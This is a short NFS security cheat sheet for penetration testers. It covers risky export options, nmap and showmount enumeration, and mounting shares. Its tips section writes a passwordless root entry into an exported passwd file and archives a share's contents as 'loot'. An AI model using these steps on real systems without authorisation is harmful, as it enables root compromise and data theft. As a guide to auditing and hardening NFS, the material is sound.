NFS

NFS Security & Exploitation Guide

1. About NFS

Network File System (NFS) is a distributed file system protocol originally developed by Sun Microsystems. Its purpose is to allow systems to:

• Access remote file systems over a network as if they were local.

• Provide file sharing primarily between Linux and Unix systems (not directly compatible with SMB).

Configuration File:

• /etc/exports defines which directories are shared and the permissions granted to clients.

Default Ports:

• RPC portmapper: 111/TCP & UDP

• NFS service: 2049/TCP & UDP

---

2. Dangerous NFS Export Settings

Some NFS configurations can be insecure and lead to privilege escalation or unauthorized access:

• rw → Grants read & write permissions.

• insecure → Allows connections from ports >1024 (less trusted).

• nohide → Exports nested filesystems automatically.

• no_root_squash → Critical risk: root users on clients retain root privileges on the NFS share (can create files owned by UID/GID 0).

Best Practice: Always avoid no_root_squash in production environments.

---

3. Enumeration & Exploitation

Nmap Enumeration

Use Nmap NSE scripts to fingerprint NFS:

sudo nmap -sV -p111,2049 --script nfs* 192.0.2.15

Show Available NFS Shares

showmount -e 192.0.2.15

Example output:

Export list for 192.0.2.15:
/srv/nfs_share *

---

4. Mounting & Unmounting NFS Shares

Mount a Share

mkdir target-NFS
sudo mount -t nfs 192.0.2.15:/srv/nfs_share ./target-NFS/ -o nolock

Unmount a Share

sudo umount ./target-NFS

---

5. Tips & Tricks for Pentesters

• Privilege Escalation via no_root_squash If enabled, create a file owned by root on your local system, then copy it to the mounted share:

  echo "hacked::0:0::/root:/bin/bash" > ./target-NFS/passwd

  This could allow creation of root accounts if /etc/passwd is exported.

• Recursive Share Search Check for nested exports using findmnt or mounting multiple shares.

• Quick Looting with tar Instead of downloading files individually:

  cd ./target-NFS
  tar -cvf loot.tar *